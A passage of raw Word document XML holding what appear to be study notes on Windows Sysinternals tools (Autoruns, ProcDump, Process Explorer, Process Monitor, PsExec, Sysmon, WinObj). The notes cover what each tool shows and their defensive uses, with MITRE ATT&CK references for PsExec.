        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>provides insight into auto-starting locations of startup monitors, programs configured to run during bootup or login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9A83D2" w14:textId="63882E50" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">reports Explorer shell extensions, toolbars, browser helper objects, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Winlogon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> notifications, auto-start services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65A7DF" w14:textId="40AD6C72" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>helps detect malicious entries created to establish persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58261A9E" w14:textId="43606282" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Image Hijacks Tab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AFE6D2" w14:textId="30A8C5EE" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ProcDump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55BE11B4" w14:textId="0554A9AC" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>monitoring application for CPU spikes and generation of crash crumps during a spike that admins can use to determine cause</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BFDE183" w14:textId="774E2757" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Explorer can do the same</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C482899" w14:textId="6091458C" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Right-click on a process &gt; mini or full dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4025E39A" w14:textId="3AC68B01" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00167851" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF8040" w14:textId="322F40A9" w:rsidR="00167851" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Shows handles of selected processes or display DLLs and memory-mapped files that the process has loaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D064B1" w14:textId="55D911EB" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>check IPs of active services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03914D5A" w14:textId="5A138CE8" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Talos Reputation Center</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B117853" w14:textId="4D6A687C" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Verify Signatures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0637437A" w14:textId="0407ED28" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Run at Logon and Replace Task Manager are also options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F21BB33" w14:textId="1B32FC32" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Color Coding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E01DB51" w14:textId="180B9D14" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Purple – packed files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1095BA9F" w14:textId="2281EB25" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Red – process is exiting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D26BC69" w14:textId="0220BA92" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Green – freshly spawned process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA229BD" w14:textId="660255C6" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Light Blue – processes run by same account that started Process Explorer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A188CA" w14:textId="51FCE02E" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dark Blue – process is selected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D311508" w14:textId="6FBC995A" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Pink – process is a service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31541040" w14:textId="1370208D" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Dark Grey – process is suspended until resumption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9D6C4E" w14:textId="52C88521" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="00CB6C10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Process Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A83028" w14:textId="1D6D0E05" w:rsidR="00CB6C10" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">shows real-time file system, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Registry</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> and process/thread activity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBF8ADD" w14:textId="2EAB0321" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>rich and non-destructive filtering, session IDs, usernames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3D08B" w14:textId="5A325D83" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>full thread stacks with integrated symbol support, simultaneous logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A464D" w14:textId="4EFCB24A" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>set filters by PID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F50928E" w14:textId="5837B461" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">filters must be used and configured properly </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>in order to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ProcMon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> efficiently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0FCB32" w14:textId="1A71D26C" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="00544BE7" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidR="003C4919" w:rsidRPr="0084205E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://adamtheautomator.com/procmon/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7306A293" w14:textId="67300A4F" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39086113" w14:textId="259D4A55" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>light-weight telnet replacement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3952E2" w14:textId="30E66B9B" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>execute processes on other systems without installing client software</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BAEC8F" w14:textId="6947AA6E" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">launching interactive command-prompts to remote systems and remote-enabling tools such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>IpConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7D6222A9" w14:textId="669A744F" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Has been used as MITRE Techniques T1570 (Lateral Tool Transfer), T1021.002 (Remote Services: SMB/Windows Admin Shares), and T1569.002 (System Services: Services Execution)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6CE300" w14:textId="5A4FA993" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>MITRE ID – S0029</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D294D49" w14:textId="56A1837E" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Security Utilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3E6DF7" w14:textId="2464F438" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="003C4919" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF9D55F" w14:textId="08CBA4F0" w:rsidR="003C4919" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>remains resident across system reboots to monitor and log system activity to Windows event log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078332C1" w14:textId="5C22EF30" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>detailed information about process creations, network connections, and changes to file creation time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433EEC5D" w14:textId="4EB6F5D8" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>generates Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand intrusion/malware operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C024525" w14:textId="1FA81383" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>System Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C352BE" w14:textId="482AAE48" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>WinObj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="286CE6BC" w14:textId="2F0E8030" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>32-bit Windows NT program that uses native Windows NT API to access and display info on the NT Object Managers name space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A587C4A" w14:textId="552254E0" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session 0 and Session 1 (OS and User respectively)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211EECF8" w14:textId="1579147A" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>two csrss.exe processes running, one for each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61134EDB" w14:textId="7F363EBE" w:rsidR="00632976" w:rsidRPr="0084205E" w:rsidRDefault="00632976" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Session 0</w:t>
      </w:r>
    </w:p>
